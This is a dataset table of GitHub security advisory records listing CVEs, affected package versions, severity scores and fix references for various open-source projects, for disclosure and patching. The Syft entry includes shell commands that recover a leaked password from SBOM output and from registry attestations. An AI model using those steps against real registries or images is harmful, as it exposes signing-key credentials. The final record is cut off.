schema_version
stringclasses
1 value
id
stringlengths
19
19
modified
stringlengths
20
20
published
stringlengths
20
20
withdrawn
stringlengths
20
20
aliases
stringlengths
2
20
summary
stringlengths
20
140
details
stringlengths
56
37.2k
severity
stringlengths
2
92
affected
stringlengths
88
7.07k
references
stringlengths
139
4.72k
database_specific
stringlengths
131
185
1.4.0
GHSA-4gj3-6r43-3wfc
2023-02-17T20:32:08Z
2023-02-10T19:54:14Z
null
['CVE-2023-23631']
IPFS go-unixfsnode subject to DOS via HAMT Decoding Panics
## Impact Trying to read malformed HAMT sharded directories can cause panics and virtual memory leaks. If you are reading untrusted user input, an attacker can then trigger a panic. This is caused by a bogus fanout parameter in the HAMT directory nodes. This includes checks returned in [ipfs/go-bitfield GHSA-2h6c-j3gf-xp9r](https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r), as well as limiting the fanout to <= 1024 (to avoid attempts of arbitrary sized allocations). ## Patches - https://github.com/ipfs/go-unixfsnode/commit/91b3d39d33ef0cd2aff2c95d50b2329350944b68 - https://github.com/ipfs/go-unixfsnode/commit/a4ed723727e0bdc2277158337c2fc0d82802d122 ## References * https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778 * https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/ipfs/go-unixfsnode'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/ipfs/go-unixfsnode/security/advisories/GHSA-4gj3-6r43-3wfc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23631'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-unixfsnode/commit/59050ea8bc458ae55246ae09243e6e165923e076'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-unixfsnode/commit/91b3d39d33ef0cd2aff2c95d50b2329350944b68'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-unixfsnode/commit/a4ed723727e0bdc2277158337c2fc0d82802d122'}, {'type': 'PACKAGE', 'url': 'https://github.com/ipfs/go-unixfsnode'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1559'}]
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T19:54:14Z', 'nvd_published_at': '2023-02-09T21:15:00Z'}
1.4.0
GHSA-9xm8-8qvc-vw3p
2023-02-07T22:41:28Z
2023-02-07T22:41:28Z
null
['CVE-2020-29242']
Denial of Service in dhowden/tag
dhowden tag before 0.0.0-20201120070457-d52dcb253c63 allows `panic: runtime error: index out of range` via readPICFrame.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/dhowden/tag'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-20201120070457-d52dcb253c63'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29242'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/issues/77'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/issues/78'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/issues/79'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/issues/80'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/commit/4b595ed4fac79f467594aa92f8953f90f817116e'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/commit/6b18201aa5c5535511802ddfb4e4117686b4866d'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/commit/a92213460e4838490ce3066ef11dc823cdc1740e'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/commit/d52dcb253c63a153632bfee5f269dd411dcd8e96'}, {'type': 'PACKAGE', 'url': 'https://github.com/dhowden/tag'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0097'}]
{'cwe_ids': ['CWE-129'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T22:41:28Z', 'nvd_published_at': None}
1.4.0
GHSA-6p89-3p7c-qrhv
2023-02-23T21:52:54Z
2023-02-13T21:31:04Z
2023-02-15T15:36:00Z
['CVE-2022-48110']
Cross-site scripting in CKEditor5
CKSource CKEditor5 35.4.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Full Featured CKEditor5 widget. NOTE: the vendor's position is that this is not a vulnerability. The CKEditor 5 documentation discusses that it is the responsibility of an integrator (who is adding CKEditor 5 functionality to a website) to choose the correct security settings for their use case. Also, safe default values are established (e.g., config.htmlEmbed.showPreviews is false).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'ckeditor5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '36.0.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-48110'}, {'type': 'WEB', 'url': 'https://ckeditor.com/docs/ckeditor5/latest/features/html-embed.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/ckeditor/ckeditor5'}, {'type': 'WEB', 'url': 'https://packetstormsecurity.com/files/170927/CKSource-CKEditor5-35.4.0-Cross-Site-Scripting.html'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:29:24Z', 'nvd_published_at': '2023-02-13T20:15:00Z'}
1.4.0
GHSA-jp7v-3587-2956
2023-02-08T21:38:46Z
2023-02-08T21:38:46Z
null
['CVE-2023-24827']
Credential disclosure in syft when SYFT_ATTEST_PASSWORD environment variable set
A password disclosure flaw was found in Syft versions v0.69.0 and v0.69.1. This flaw leaks the password stored in the SYFT_ATTEST_PASSWORD environment variable. ### Impact The `SYFT_ATTEST_PASSWORD` environment variable is for the `syft attest` command to generate attested SBOMs for the given container image. This environment variable is used to decrypt the private key (provided with `syft attest --key <path-to-key-file>`) during the signing process while generating an SBOM attestation. This vulnerability affects users running syft that have the `SYFT_ATTEST_PASSWORD` environment variable set with credentials (regardless of if the attest command is being used or not). Users that do not have the environment variable `SYFT_ATTEST_PASSWORD` set are not affected by this issue. The credentials are leaked in two ways: - in the syft logs when `-vv` or `-vvv` are used in the syft command (which is any log level >= `DEBUG`) - in the attestation or SBOM only when the `syft-json` format is used Note that as of v0.69.0 any generated attestations by the `syft attest` command are uploaded to the OCI registry (if you have write access to that registry) in the same way `cosign attach` is done. This means that any attestations generated for the affected versions of syft when the `SYFT_ATTEST_PASSWORD` environment variable was set would leak credentials in the attestation payload uploaded to the OCI registry. Example commands run from affected versions of syft that show the credential disclosure: ```bash $ SYFT_ATTEST_PASSWORD=123456 syft <container-image-or-directory-input> -o syft-json | grep 123456 # "123456" is in the output $ SYFT_ATTEST_PASSWORD=123456 syft attest <container-image-input> -o syft-json $ cosign download attestation <container-image-input> | jq -r '.payload' | base64 -d | grep 123456 # "123456" is in the output ``` ### Patches The patch has been released in v0.70.0. ### Workarounds There are no workarounds for this vulnerability. ### References Patch pull request: https://github.com/anchore/syft/pull/1538
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/anchore/syft'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.69.0'}, {'fixed': '0.70.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/anchore/syft/security/advisories/GHSA-jp7v-3587-2956'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24827'}, {'type': 'WEB', 'url': 'https://github.com/anchore/syft/commit/9995950c70e849f9921919faffbfcf46401f71f3'}, {'type': 'PACKAGE', 'url': 'https://github.com/anchore/syft'}]
{'cwe_ids': ['CWE-200', 'CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T21:38:46Z', 'nvd_published_at': '2023-02-07T01:15:00Z'}
1.4.0
GHSA-33m6-q9v5-62r7
2023-02-07T22:57:53Z
2023-02-07T22:57:53Z
null
['CVE-2021-3538']
github.com/satori/go.uuid has Predictable SIF UUID Identifiers
### Impact The siftool new command produces predictable UUID identifiers due to insecure randomness in the version of the `github.com/satori/go.uuid` module used as a dependency. ### Patches A patch is available in version >= v1.2.1-0.20180404165556-75cca531ea76 of the module. Users are encouraged to upgrade. Fixed by https://github.com/hpcng/sif/pull/90 ### Workarounds Users passing CreateInfo struct should ensure the ID field is generated using a version of github.com/satori/go.uuid that is not vulnerable to this issue. Unfortunately, the latest tagged release is vulnerable to this issue. One way to obtain a non-vulnerable version is: `go get -u github.com/satori/go.uuid@v1.2.1-0.20180404165556-75cca531ea76` ### References https://github.com/satori/go.uuid/issues/73 ### For more information If you have any questions or comments about this advisory: Open an issue in https://github.com/hpcng/sif/issues
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/satori/go.uuid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.1-0.20180103161547-0ef6afb2f6cd'}, {'fixed': '1.2.1-0.20180404165556-75cca531ea76'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/apptainer/sif/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.1-0.20180103161547-0ef6afb2f6cd'}, {'fixed': '1.2.1-0.20180404165556-75cca531ea76'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/hpcng/sif/security/advisories/GHSA-33m6-q9v5-62r7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3538'}, {'type': 'WEB', 'url': 'https://github.com/satori/go.uuid/issues/73'}, {'type': 'WEB', 'url': 'https://github.com/satori/go.uuid/pull/75'}, {'type': 'WEB', 'url': 'https://github.com/satori/go.uuid/commit/75cca531ea763666bc46e531da3b4c3b95f64557'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1954376'}, {'type': 'PACKAGE', 'url': 'https://github.com/satori/go.uuid'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0244'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMSATORIGOUUID-72488'}]
{'cwe_ids': ['CWE-338'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T22:57:53Z', 'nvd_published_at': '2021-06-02T14:15:00Z'}
1.4.0
GHSA-m22q-97p5-79v2
2023-02-22T00:11:36Z
2023-02-21T00:30:20Z
null
['CVE-2021-32851']
Mind-elixir Cross-site Scripting vulnerability
Mind-elixir is a free, open source mind map core. Prior to version 0.18.1, mind-elixir is prone to cross-site scripting when handling untrusted menus. This issue is patched in version 0.18.1.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'mind-elixir'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.18.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32851'}, {'type': 'WEB', 'url': 'https://github.com/ssshooter/mind-elixir-core/commit/073485269ac83af24371f35bd08507defa885655'}, {'type': 'PACKAGE', 'url': 'https://github.com/ssshooter/mind-elixir-core'}, {'type': 'WEB', 'url': 'https://github.com/ssshooter/mind-elixir-core/blob/79942a68b14c8875ab7d270b1ad25bfff351b04c/src/plugin/contextMenu.js#L13'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-1047_Mind-elixir/'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:11:36Z', 'nvd_published_at': '2023-02-20T22:15:00Z'}
1.4.0
GHSA-6pm2-j2v8-h3cj
2023-02-15T17:39:56Z
2023-02-06T21:30:29Z
2023-02-09T22:03:51Z
['CVE-2023-0669']
Withdrawn: Fortra GoAnywhere MFT Deserialization of Untrusted Data vulnerability affects metasploit-framework
## Withdrawn This advisory has been withdrawn because it was incorrectly associated with the metasploit-framework package, which is not affected by this CVE, and the actual vulnerable component does not fit within our supported ecosystems. This link is maintained to preserve external references. ## Original Description Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'metasploit-framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.0.33'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0669'}, {'type': 'WEB', 'url': 'https://github.com/rapid7/metasploit-framework/pull/17607'}, {'type': 'WEB', 'url': 'https://attackerkb.com/topics/mg883Nbeva/cve-2023-0669/rapid7-analysis'}, {'type': 'WEB', 'url': 'https://duo.com/decipher/fortra-patches-actively-exploited-zero-day-in-goanywhere-mft'}, {'type': 'WEB', 'url': 'https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/rapid7/metasploit-framework'}, {'type': 'WEB', 'url': 'https://infosec.exchange/@briankrebs/109795710941843934'}, {'type': 'WEB', 'url': 'https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1'}, {'type': 'WEB', 'url': 'https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/'}]
{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:39:43Z', 'nvd_published_at': '2023-02-06T20:15:00Z'}
1.4.0
GHSA-vvjv-97j8-94xh
2023-03-10T18:34:20Z
2023-02-28T23:19:24Z
null
['CVE-2023-22738']
vantage6 vulnerable to Improper Preservation of Permissions
### Impact Assigning existing users to a different organization is currently possible. It may lead to unintended access: if a user from organization A is accidentally assigned to organization B, they will retain their permissions and therefore might be able to access stuff they should not be allowed to access. ### Patches Update to 3.8.0 ### Workarounds None ### References None ### For more information If you have any questions or comments about this advisory: * Email us at [vantage6@iknl.nl](mailto:vantage6@iknl.nl)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'vantage6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.8.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/vantage6/vantage6/security/advisories/GHSA-vvjv-97j8-94xh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22738'}, {'type': 'WEB', 'url': 'https://github.com/vantage6/vantage6/commit/798aca1de142a4eca175ef51112e2235642f4f24'}, {'type': 'PACKAGE', 'url': 'https://github.com/vantage6/vantage6'}]
{'cwe_ids': ['CWE-281'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T23:19:24Z', 'nvd_published_at': '2023-03-01T21:15:00Z'}
1.4.0
GHSA-99c3-qc2q-p94m
2023-02-22T19:16:06Z
2023-02-22T19:16:06Z
null
['CVE-2023-25158']
GeoTools OGC Filter SQL Injection Vulnerabilities
### Impact GeoTools includes support for OGC Filter expression language parsing, encoding and execution against a range of datastore. SQL Injection Vulnerabilities have been found when executing OGC Filters with JDBCDataStore implementations: 1. ``PropertyIsLike`` filter * Requires PostGIS DataStore with "encode functions" enabled * Or any JDBCDataStore (all relational databases) with String field (no mitigation) 3. ``strEndsWith`` function * Requires PostGIS DataStore with "encode functions" enabled 5. ``strStartsWith`` function * Requires PostGIS DataStore with "encode functions" enabled 6. ``FeatureId`` filter * Requires JDBCDataStore (all relational databases) with prepared statements disabled and table with String primary key (Oracle not affected, SQL Server and MySQL have no settings to enabled prepared statements, PostGIS does) 7. ``jsonArrayContains`` function * Requires PostGIS and Oracle DataStore with String or JSON field 8. ``DWithin`` filter * Happens only in Oracle DataStore, no mitigation ### Patches * GeoTools 28.2 * GeoTools 27.4 * GeoTools 26.7 * GeoTools 25.7 * GeoTools 24.7 ### Workarounds Partial mitigation: * In PostGIS DataStore disable "encode functions" * In any PostGIS enable "prepared statements" (only database with such settings) ```java Map<String, Object> params = new HashMap<>(); params.put("dbtype", "postgis"); params.put("host", "localhost"); params.put("port", 5432); params.put("schema", "public"); params.put("database", "database"); params.put("user", "postgres"); params.put("passwd", "postgres"); params.put("preparedStatements", true ); // mitigation params.put("encode functions", false ); // mitigation DataStore dataStore = DataStoreFinder.getDataStore(params); ``` ### References * [OGC Filter SQL Injection Vulnerabilities](https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf) (GeoServer)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.geotools:gt-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '28.0'}, {'fixed': '28.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geotools:gt-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '27.0'}, {'fixed': '27.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geotools:gt-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '26.0'}, {'fixed': '26.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geotools:gt-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '25.0'}, {'fixed': '25.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geotools:gt-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '24.7'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/geotools/geotools/security/advisories/GHSA-99c3-qc2q-p94m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25158'}, {'type': 'WEB', 'url': 'https://github.com/geotools/geotools/commit/64fb4c47f43ca818c2fe96a94651bff1b3b3ed2b'}, {'type': 'PACKAGE', 'url': 'https://github.com/geotools/geotools'}]
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T19:16:06Z', 'nvd_published_at': '2023-02-21T21:15:00Z'}
1.4.0
GHSA-9mwf-mw74-9cv5
2023-03-06T19:37:46Z
2023-02-24T12:31:20Z
null
['CVE-2023-25696']
Apache Airflow Hive Provider Improper Input Validation vulnerability
Improper Input Validation vulnerability in the Apache Airflow Hive Provider. This issue affects Apache Airflow Hive Provider versions before 5.1.3.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-apache-hive'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25696'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/29502'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/99g0qm56wmgdxmbtdsvhj4rdnxhpzpml'}]
{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:25:28Z', 'nvd_published_at': '2023-02-24T12:15:00Z'}
1.4.0
GHSA-jpxj-2jvg-6jv9
2023-02-16T23:34:17Z
2023-02-16T21:30:28Z
null
['CVE-2023-0475']
Data Amplification in HashiCorp go-getter
HashiCorp go-getter up to 1.6.2 and 2.1.1 is vulnerable to decompression bombs. Fixed in 1.7.0 and 2.2.0.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/go-getter'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/go-getter/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0475'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/go-getter/commit/0edab85348271c843782993345b07b1ac98912e6'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/go-getter/commit/78e6721a2a76266718dc92c3c03c1571dffdefdc'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-4-go-getter-vulnerable-to-denial-of-service-via-malicious-compressed-archive/50125'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/go-getter'}]
{'cwe_ids': ['CWE-409'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T23:34:17Z', 'nvd_published_at': '2023-02-16T19:15:00Z'}
1.4.0
GHSA-8g23-2q5p-8866
2023-03-06T21:57:35Z
2023-02-24T12:31:20Z
null
['CVE-2023-25691']
Apache Airflow Google Provider Improper Input Validation vulnerability
Improper Input Validation vulnerability in the Apache Airflow Google Provider. This issue affects Apache Airflow Google Provider versions before 8.10.0.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-google'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.10.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25691'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/29497'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/zdr8ovfttbh7kj0lydgcw88tbt2nmkcy'}]
{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:25:46Z', 'nvd_published_at': '2023-02-24T12:15:00Z'}
1.4.0
GHSA-66p8-j459-rq63
2023-02-10T23:11:01Z
2023-02-10T23:11:01Z
null
['CVE-2023-25168']
Pterodactyl Wings contains UNIX Symbolic Link (Symlink) Following resulting in deletion of files and directories on the host system
### Impact This vulnerability impacts anyone running the affected versions of Wings. The vulnerability can be used to delete files and directories recursively on the host system. This vulnerability can be combined with [`GHSA-p8r3-83r8-jwj5`](https://github.com/pterodactyl/wings/security/advisories/GHSA-p8r3-83r8-jwj5) to overwrite files on the host system. In order to use this exploit, an attacker must have an existing "server" allocated and controlled by Wings. Information on how the exploitation of this vulnerability works will be released on February 24th, 2023 in North America. ### Patches This vulnerability has been resolved in version `v1.11.4` of Wings, and has been back-ported to the 1.7 release series in `v1.7.4`. Anyone running `v1.11.x` should upgrade to `v1.11.4` and anyone running `v1.7.x` should upgrade to `v1.7.4`. ### Workarounds None at this time.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/pterodactyl/wings'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/pterodactyl/wings'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.11.0'}, {'fixed': '1.11.4'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/security/advisories/GHSA-66p8-j459-rq63'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/security/advisories/GHSA-p8r3-83r8-jwj5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25168'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/commit/429ac62dba22997a278bc709df5ac00a5a25d83d'}, {'type': 'PACKAGE', 'url': 'https://github.com/pterodactyl/wings'}]
{'cwe_ids': ['CWE-59'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T23:11:01Z', 'nvd_published_at': '2023-02-09T00:16:00Z'}
1.4.0
GHSA-qpm3-vr34-h8w8
2023-02-16T21:55:13Z
2023-02-07T00:30:24Z
null
['CVE-2022-28923']
Open Redirect in Caddy
Caddy v2.4.6 was discovered to contain an open redirection vulnerability which allows attackers to redirect users to phishing websites via crafted URLs
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/caddyserver/caddy/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.0-beta.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-28923'}, {'type': 'WEB', 'url': 'https://github.com/caddyserver/caddy/commit/78b5356f2b1945a90de1ef7f2c7669d82098edbd'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-qpm3-vr34-h8w8'}, {'type': 'PACKAGE', 'url': 'https://github.com/caddyserver/caddy'}, {'type': 'WEB', 'url': 'https://lednerb.de/en/publications/responsible-disclosure/caddy-open-redirect-vulnerability/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1567'}]
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T15:35:34Z', 'nvd_published_at': '2023-02-06T23:15:00Z'}
1.4.0
GHSA-w695-p3j5-hrj9
2023-03-06T19:38:25Z
2023-02-24T12:31:20Z
null
['CVE-2023-25956']
Apache Airflow AWS Provider Generates Error Message Containing Sensitive Information
Generation of Error Message Containing Sensitive Information vulnerability in the Apache Airflow AWS Provider. This issue affects Apache Airflow AWS Provider versions before 7.2.1.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-amazon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.2.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25956'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/29587'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/07pl9y4gdpw2c6rzqm77dvkm2z2kb5gv'}]
{'cwe_ids': ['CWE-209'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:24:59Z', 'nvd_published_at': '2023-02-24T12:15:00Z'}
1.4.0
GHSA-9fqc-9cpr-w73q
2023-02-10T22:06:31Z
2023-02-04T03:30:25Z
null
['CVE-2023-0671']
froxlor is vulnerable to privilege escalation from customer to root via directory-options
Code Injection in GitHub repository froxlor/froxlor prior to 2.0.10.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.10'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0671'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/0034681412057fef2dfe9cce9f8a6e3321f52edc'}, {'type': 'PACKAGE', 'url': 'https://github.com/Froxlor/Froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c2a84917-7ac0-4169-81c1-b61e617023de'}]
{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-06T19:33:16Z', 'nvd_published_at': '2023-02-04T01:15:00Z'}
1.4.0
GHSA-9vx8-f5c4-862x
2023-03-31T14:27:12Z
2023-02-24T17:39:18Z
null
[]
XML External Entity (XXE) vulnerability in apoc.import.graphml
